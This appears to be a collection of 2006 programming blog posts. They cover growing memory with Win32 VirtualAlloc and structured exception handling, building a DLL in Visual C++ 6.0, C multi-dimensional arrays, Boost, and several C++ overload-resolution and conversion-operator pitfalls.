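    unsigned long orig_val;  /* original byte value expected at addr */
    unsigned long new_val;   /* new byte value to write at addr      */
    unsigned long pad;       /* pad the record to 16 bytes           */
} PATCHCODE, *PPATCHCODE;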


At first glance, what could better suit this task than Win32's shiny virtual memory management and structured exception handling (SEH)? The design is simple:


except_handler(...){

new_mem=VirtualAlloc(2*cur_size);
copy_mem(cur_mem, new_mem, cur_size);

VirtualFree(cur_mem);
cur_mem = new_mem;

return EXECUTION_CONTINUE;

if anything is wrong, return EXECUTION_SEARCH;
}

patcher(...){

cur_mem = VirtualAlloc(initial_size);

__try{
read_data(FILE, cur_mem[counter]->data);
counter++;
}
__except(except_handler(...)){
do_something;
}
}


Naturally this code doesn't work. What a surprise. Well then, let's try to debug the code and see what's wrong. Again, you are hitting your head against the wall: MS Visual Studio 6.0 just hangs after the memory violation and won't jump to the exception handler subroutine. Now you have two choices if you cannot debug at the assembly level: 1) try to figure out what's wrong by playing with the code; 2) give up! Because if your debugger of choice cannot correctly follow the logic of execution (in the setting of exception handling, where things only truly reveal themselves at the assembly level), there is not much chance you can make it work.


So now off we go to debug this code in SoftICE; VirtualAlloc seems to be a natural choice to set a breakpoint on. After much tracing, it's observed that the code fails because of this: a single line of C code is often compiled into 4-5 machine instructions, and the exception can only happen and resume at a single machine instruction, NOT at the C line! To make it easier to debug this code, I rewrote the patcher subroutine to this:


patcher(...){

cur_mem = VirtualAlloc(initial_size);

__try{
read_data(FILE, tmp_data);
cur_mem[counter]->data = tmp_data;
counter++;
}
__except(except_handler(...)){
do_something;
}
}

Since tmp_data is an automatic (on-stack) variable and is guaranteed to be accessible, the exception no longer occurs inside the convoluted read_data subroutine, be it Win32 or libc. The exception now occurs at the line:


cur_mem[counter]->data = tmp_data;

which is translated to machine code like this:

mov eax, [ebp-20] ; $tmp_data
mov ecx, [0040xxxx] ; $cur_mem
mov edx, [ebp-24] ; counter
mov [ecx+edx], eax ; $cur_mem[counter]->data = $tmp_data

So in this hypothetical case, the single C line is translated into 4 machine instructions. And really the exception (memory access violation) occurs at the last instruction,


mov [ecx+edx], eax

Now imagine for a second, why is this a problem?

The problem is that when the exception handler allocates the new space, new_mem is a pointer to a different memory location, not what cur_mem was referring to. In other words, even though we allocated new memory space and instructed the processor to retry the last instruction that generated the exception, we are still doomed to fail, because the instruction operates on the values already loaded into the registers. The registers do not update their contents to reflect the fact that we have now moved to a completely new memory location. To be more specific, consider the following scenario:


mov eax, [ebp-20] ; $tmp_data =0x00 00 00 05
mov ecx, [0040xxxx] ; $cur_mem =0x03 00 00 00
mov edx, [ebp-24] ; counter =0x00 00 10 00 4k page boundary
mov [ecx+edx], eax ; $cur_mem[counter]->data = $tmp_data

ecx+edx = 0300 1000; since these general-purpose registers have their values restored when the kernel returns from the fault handler (through the trap gate in the IDT), mov [ecx+edx], eax will attempt the same memory access and simply fault again. What we really wanted is what the C code cur_mem->data = tmp_data expresses: cur_mem holds a new value now, and we should be accessing our shiny new memory space. Because a single C line is not an atomic execution (it is compiled into multiple machine instructions), our program cannot run properly, and we have no way to control the register values in ecx and edx upon returning from the exception handler.


How do we remedy this problem? We must guarantee that upon returning from the exception handler, ecx+edx points to valid read/write memory. It'd be handy if there were a VirtualReAlloc, but no such function is documented in MSDN. Another approach would be to allocate some memory somewhere else to save the current memory, then free cur_mem and VirtualAlloc again at a fixed base address with double the cur_mem_size.


|-----------| <- cur_mem
|           |   (one box = cur_mem->size)
|-----------| <- cur_mem + cur_mem->size
|           |   (kept free so cur_mem can be re-allocated at double its size)
|-----------| <- tmp_mem (at or beyond cur_mem + 2 * cur_mem->size)
|           |
|-----------|

In order to be able to allocate double cur_mem->size at the same base, you have to make sure the temporary memory space starts at least at cur_mem + 2*cur_mem->size, as shown in the graph. A box indicates cur_mem->size worth of memory. If you fail to satisfy this condition, you will not be able to VirtualAlloc at the fixed cur_mem address with double its current size. This approach is definitely doable, but the master Jedi programmer will no doubt frown on its design and efficiency. The exception handler is simply too expensive, and this is against its design principle of being efficient and decisive.


What about this? We simply VirtualFree(cur_mem) and then VirtualAlloc(cur_mem, 2*cur_size)? This reduces the overhead of allocating new memory space and transferring data, and yet guarantees the fixed memory address allocation. This solution may sound good on paper; however, it's almost guaranteed to fail because of the Win32 memory management mechanism. First of all, VirtualFree and VirtualAlloc will fill the newly allocated memory with 0; and even if we could stop them from zeroing the pages, we cannot guarantee that we will be dealing with the same physical page again after task switches and kernel call gate control transfers. We may not get the same physical page, and even if we are lucky enough to regain it, its contents may have been overwritten by another task or the kernel. So this approach will simply not work.


The next idea we could come up with is to allocate a new memory block that is concatenated directly after the current memory block, as shown in the following graph. The idea is to allocate a new block of memory at the fixed address where the last fault occurred. This seems rather plausible; the only drawback would be the hassle of cleaning it up, since we have to VirtualFree every memory block that we allocate inside the exception handler. But it still sounds like a reasonable solution, until we put it into implementation: VirtualAlloc will not return a useful memory address when given the fixed bad address where the exception occurred.



|-----------| <- cur_mem
|           |   (one box = cur_mem->size)
|-----------| <- concat_mem (allocated right after cur_mem, at the fault address)
|           |
|-----------|

Ok, finally something that really works. The idea is to initially reserve a large chunk of memory and commit pages on demand. But this is really a static memory approach and would not truly meet our requirement. Now imagine for a second: how would you solve this problem?

Build DLL (dynamic linked library) with microsoft visual studio

This article explains how to work with the default Microsoft VC 6.0 IDE to compile a DLL from given C code. It also shows how to use this DLL from another given C file.

Let's say you have three files: a_main.c, a_dll.c, and a_comm.h. Both .c files use the .h header. Let's first generate a_dll.dll from a_dll.c. Double-clicking a_dll.c in Windows should automatically open it in the VC IDE; if this is not the case, you need to associate .c files with the VC IDE. Next, try to compile a_dll.c; at this point VC will create a workspace template for you. Now this is the point where you need to change the default workspace/project settings so that instead of linking and producing an EXE file, a DLL file is generated. First set the active configuration to Win32 Release, then open the Project/Settings dialog. Click on C/C++; this is the compilation settings tab. You need to put the following defines in the "Preprocessor definitions" text field: _USRDLL and A_DLL_EXPORTS. _USRDLL tells the compiler/preprocessor that this file is intended to be compiled into a DLL. A_DLL_EXPORTS tells the compiler that this file, as a DLL, exports symbols. A_DLL_EXPORTS is an instance of the FILENAME_EXPORTS pattern; because we are working with a_dll.c here, we replace FILENAME with A_DLL. If the file were named b_dll.c, we'd have used B_DLL_EXPORTS.
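The article never shows the header, but the FILENAME_EXPORTS convention usually goes hand in hand with a header along these lines. This is a hypothetical sketch of what a_comm.h could contain (the function name is made up), so that one declaration exports from a_dll.c and imports everywhere else:

#ifndef A_COMM_H
#define A_COMM_H

#ifdef A_DLL_EXPORTS
#define A_DLL_API __declspec(dllexport)   /* building a_dll.c itself    */
#else
#define A_DLL_API __declspec(dllimport)   /* consumers such as a_main.c */
#endif

#ifdef __cplusplus
extern "C" {
#endif

A_DLL_API int a_dll_compute(int x, int y);   /* hypothetical exported function */

#ifdef __cplusplus
}
#endif

#endif /* A_COMM_H */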

There is another flag, _WINDOWS, that may need to be added depending on the nature of the DLL. If the DLL imports anything from USER32.DLL, i.e. works with GUI components, then we must replace the default _CONSOLE flag with _WINDOWS. The VC default project template settings assume a Win32 console application is being compiled, so use either _WINDOWS or _CONSOLE depending on what kind of DLL you are working with. Save your settings changes by clicking the "OK" button. At this point, a_dll.c should compile to a_dll.obj without any problem.

Next we must modify the settings used during the VC linking process. The object code is linked with other libraries to produce either an EXE file or a DLL file; the default template project settings will link to a Win32 console EXE. Open the Project/Settings dialog again in VC and choose the "Link" tab. In the "Output file name" text field, change a_dll.exe to a_dll.dll. This change tells the linker we want a DLL built from the source code a_dll.c. If you didn't change this and went ahead compiling and linking your code, VC would complain that it cannot find "main" or "WinMain", because as DLL source code, a_dll.c contains the DllMain entry point instead of main for a console app or WinMain for a Windows app. In the "Project Options" text area, go to the end of the option string and add "/dll"; this again tells the linker to produce a DLL output instead of an EXE output.

The last step again depends on what kind of DLL it is, console or Windows. You don't have to do anything else if it's a console DLL, because the default setting assumes a console target. Otherwise, in "Project Options", find "/subsystem:console" and replace it with "/subsystem:windows". Click "OK" to save the changes, and in the "Build" menu you should see that the target output has changed from a_dll.exe to a_dll.dll. You should be able to create the desired a_dll.dll now.

Granted, this seems like a lot of hassle to get VC to generate a DLL from a source file. It would have been very easy if we could have started from the project wizard and used the Win32 DLL template from day one. But occasionally one cannot expect a project build configuration to come with downloaded or copied source code, and we have to build a DLL using what we have at hand. The trick explained above demonstrates the step-by-step changes to the default project settings needed to generate a DLL.

Now on to the next step: building a.exe using the newly generated a_dll.dll. Again, load a_main.c into VC and let VC generate a default project template to work with. If you tried to build a.exe now, VC would complain during linking about functions missing from a_dll.c. To fix this, open Project/Settings and go to the Link tab. In the "Object/library modules" text field, go to the end of the list and type PATH_TO_A_DLL_LIB\a_dll.lib, where PATH_TO_A_DLL_LIB is the path to the a_dll.lib file. For example, if you have organized your files in c:\myfiles, PATH_TO_A_DLL_LIB would be Release or Debug, depending on which build configuration was used when a_dll.dll was built. This is the only change you need to make to link a_main.obj with a_dll.lib and generate the final product: a.exe.

It's interesting to note that the linker actually links a_main.obj with a_dll.lib rather than with a_dll.dll to build a.exe. a_dll.dll is only used when a.exe is running in the system, as its name implies: dynamic link library.

Memory as a programming concept in C and C++, multi-dimensional arrays

C and C++ categorize multi-dimensional arrays into two distinctly different kinds, static and dynamic.

Static multi-dimensional arrays are declared and defined at compile time. They are internally represented as a one-dimensional array and accessed through index arithmetic (addition and multiplication). For example, x[i][j] (whose size is nrow * ncol) is accessed by *(x + i*ncol + j). Because they are represented in this manner, they must be passed to functions with explicit array-bound information (except that the first dimension bound nrow can be omitted: x[3][4] can be passed as x[3][4] or x[][4]). For the same reason, static multi-dimensional arrays are passed by reference, namely the pointer value that points to the storage. C and C++ don't pass multi-dimensional arrays by value, as that would require a tremendous amount of overhead involving memory copying and passing additional array structure information on the stack call frame, even though a function declaration with a static multi-dimensional array resembles pass-by-value semantics. The next example demonstrates the subtleties of C and C++ static multi-dimensional arrays:

#include <stdio.h>

int a[3][4] = {0, 3, 4, 2, 1, 5, 6, 9, 8, 3, 2, 5};

void adjust(int x[][4]){

x[0][3] = 80;

}

int main(){

printf("a[0][3] = %d\n", a[0][3]);
adjust(a);
printf("a[0][3] = %d\n", a[0][3]);

return 0;
}

Dynamic multi-dimensional arrays are declared using pointer semantics and defined at run time, hence 'dynamic'. They are internally represented as dynamic 1-D arrays whose elements are pointers to sub-level dynamic 1-D arrays. They are accessed by dereferencing pointer values. For example, int **x is a pointer to a two-dimensional dynamic array; at run time, it's set up to point to an array of shape x[3][4]:

x = malloc(3*sizeof(int *));
for(int i = 0; i < 3; i ++)
x[i] = malloc(4*sizeof(int));

It's important to distinguish between static and dynamic multi-dimensional arrays in C and C++ because, even though they are both multi-dimensional arrays, their definition, representation and access methods are so vastly different that they can be confusing even to the most seasoned developers.
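For completeness, here is a small self-contained sketch of a dynamic two-dimensional array's full lifetime (allocation, access, release); the 3x4 shape and the stored value are purely illustrative.

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    const int nrow = 3, ncol = 4;

    /* allocate the array of row pointers, then each row */
    int **x = (int **)malloc(nrow * sizeof(int *));
    for (int i = 0; i < nrow; i++)
        x[i] = (int *)malloc(ncol * sizeof(int));

    /* access goes through two dereferences: x[i][j] is *(*(x + i) + j) */
    x[0][3] = 80;
    printf("x[0][3] = %d\n", x[0][3]);

    /* release in reverse order: each row first, then the pointer array */
    for (int i = 0; i < nrow; i++)
        free(x[i]);
    free(x);
    return 0;
}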

Monday, May 15, 2006

Beyond the C++ standard library, an introduction to boost

I recently finished reading through this book. It is a very good introduction to the Boost libraries for us mortals. The covered libraries include utility classes such as shared_ptr, scoped_ptr, intrusive_ptr, weak_ptr, operators, noncopyable, regex, etc.; container classes such as any, variant, tuple; and functional classes such as bind, lambda, function, signals. These are the MVP classes that can make C++ programmers' lives much easier. The lambda library is especially impressive when binding functors to the standard algorithms.
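As a small taste of what that looks like in practice, here is a tiny sketch using Boost.Lambda's placeholders (the values are arbitrary): the comparator and the printing functor are both built inline rather than written as separate function objects.

#include <algorithm>
#include <iostream>
#include <vector>
#include <boost/lambda/lambda.hpp>

int main()
{
    using namespace boost::lambda;

    std::vector<int> v;
    v.push_back(3); v.push_back(1); v.push_back(2);

    // sort descending, then print each element followed by a space
    std::sort(v.begin(), v.end(), _1 > _2);
    std::for_each(v.begin(), v.end(), std::cout << _1 << ' ');
    std::cout << '\n';
    return 0;
}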

Boost (www.boost.org) development is very active. Check them out.

Monday, May 08, 2006

Default arguments do not participate in overload resolution

Consider the following code:

// (1)
template <typename T>
void f(T const& x) {}

// (2)
template <typename T>
void f(T const& x, typename T::some_type* = 0) {}

struct X { typedef int some_type; } x;

int main()
{
f(x); // Comeau chooses #2. Does it conform to the Standard?

}

First, the compiler builds a viable function set. This is where SFINAE takes place and a function is either added or excluded from the set. According to 13.3.2/2

A candidate function having more than m parameters is viable only if the (m+1)-st parameter has a default argument (8.3.6).121) For the purposes of overload resolution, the parameter list is truncated on the right, so that there are exactly m parameters.

So, the viable set in this case contains functions with the default argument truncated.

Second, the compiler does partial template ordering and the actual overload resolution. Since the default argument for function 2 has been truncated, the viable function set here contains 2 identical functions which results in the ambiguity.

Overload resolution doesn't choose between names from different scopes.

Take this code example :

template <typename T>
class Base
{
protected:
Notify(T& msg);

};

struct msgA {};
struct msgB {};

class Impl : public Base<msgA>, public Base<msgB>
{
void Do()
{
msgA a;
Notify(a); // <----- AMBIGUOUS call
}
};

When compiled with the Comeau online compiler, this yields the following error:
Comeau C/C++ 4.3.3 (Aug  6 2003 15:13:37) for ONLINE_EVALUATION_BETA1
Copyright 1988-2003 Comeau Computing. All rights reserved.
MODE:strict errors C++

"ComeauTest.c", line 5: error: omission of explicit type is nonstandard ("int"
assumed)
Notify(T& msg);
^

"ComeauTest.c", line 17: error: "Base::Notify [with T=msgA]" is ambiguous
Notify(a); // <----- AMBIGUOUS call
               ^

2 errors detected in the compilation of "ComeauTest.c".
This error is a result of the rule the C++ compiler employs when resolving overloaded names from different scopes. Although both names are visible at the point of the statement, the rule says overload resolution cannot choose between names from different scopes; hence the compile error. A simple solution is to pull the names from both scopes into class Impl with using-declarations, as the sketch below shows.
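Here is a compilable sketch of that fix (I added the missing void return type and empty bodies so the fragment stands alone): the using-declarations bring both Notify names into the scope of Impl, and ordinary overload resolution then picks the right one.

template <typename T>
class Base
{
protected:
    void Notify(T& msg) {}
};

struct msgA {};
struct msgB {};

class Impl : public Base<msgA>, public Base<msgB>
{
    using Base<msgA>::Notify;   // pull both names into one scope
    using Base<msgB>::Notify;

    void Do()
    {
        msgA a;
        Notify(a);              // now unambiguous: Base<msgA>::Notify(msgA&)
    }
};

int main() { return 0; }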

With very few exceptions, name lookup must resolve to a set of names in a single scope. The major exception is when ADL is involved, but ADL only applies to namespaces which are searched, not base classes.

Friday, May 05, 2006

Why my class cannot be used in STL container?

The STL containers expect a class to provide a copy assignment operator and a copy constructor. When a class does not have them, the code won't compile (a short example follows the list below). The following rules dictate when a compiler generates a default copy assignment operator for a class:

The compiler mustn't define an implicit copy assignment operator if the class has:

-a nonstatic data member of const type, or

-a nonstatic data member of reference type, or

-a nonstatic data member of class type (or array thereof) with
an inaccessible copy assignment operator, or

-a base class with an inaccessible copy assignment operator.
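A tiny sketch of the second rule in action (Holder is a made-up name): the reference member suppresses the implicit copy assignment operator, so container operations that assign elements stop compiling, while purely copy-constructing ones still work. The failing lines are left commented out so the file itself compiles.

#include <vector>

struct Holder {
    int& ref;                         // nonstatic data member of reference type
    explicit Holder(int& r) : ref(r) {}
    // The compiler still generates a copy constructor, but it must not
    // generate a copy assignment operator (a reference cannot be reseated).
};

int main() {
    int a = 1, b = 2;
    Holder x(a), y(b);
    // x = y;                         // would not compile: no copy assignment

    std::vector<Holder> v(3, x);      // copy construction only: fine
    // v.erase(v.begin());            // would not compile: erase assigns elements
    return 0;
}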

Monday, May 01, 2006

Be careful of C++ conversion operator, road to ambiguity.

Originally by James Kanze from clcm (edited formatting)

> #include <string>
> #include

> namespace my{
> class A{
> public:
> operator std::string(){
> std::string rval;
> //do some work here
> return rval;
> };
> template <typename TypeVal>
> operator TypeVal(){
> TypeVal rval;
> //do some work here...
> return rval;
> };

You left the above function out in your original posting. It makes a big difference.

> };
> };

> int main(){
> my::A a;
> std::string s=a; //will compile without problem

Yes. But:
std::string s( a ) ;
won't.

In your version, the compiler tries to convert a to an std::string, and then uses the copy constructor to initialize s. (The copy constructor can later be elided, but for the analysis in overload resolution, access control and all the rest, the compiler must behave as if it were called.) And there is only one way to convert a my::A to an std::string -- your conversion operator. (The compiler will favor a non-template function over a template function.)

My version, using direct initialization, looks for constructors of std::string which can be called with a single my::A argument. Because of the template conversion operator, this is in fact any constructor which can be called with a single argument; there are at least two, the copy constructor and the constructor from a char const*. Both involve a user defined conversion operator, so both are equally "good", and the call is ambiguous. (Note that in this case, the compiler will favor a non-template constructor of std::string over a templated one. But none of the constructors of std::string are templates, so this doesn't help.)

> s=a; //will not compile

Same problem as my version above. There are several assignment operators which can be called with a single argument, and my::A can be converted into just about any type of argument.

> };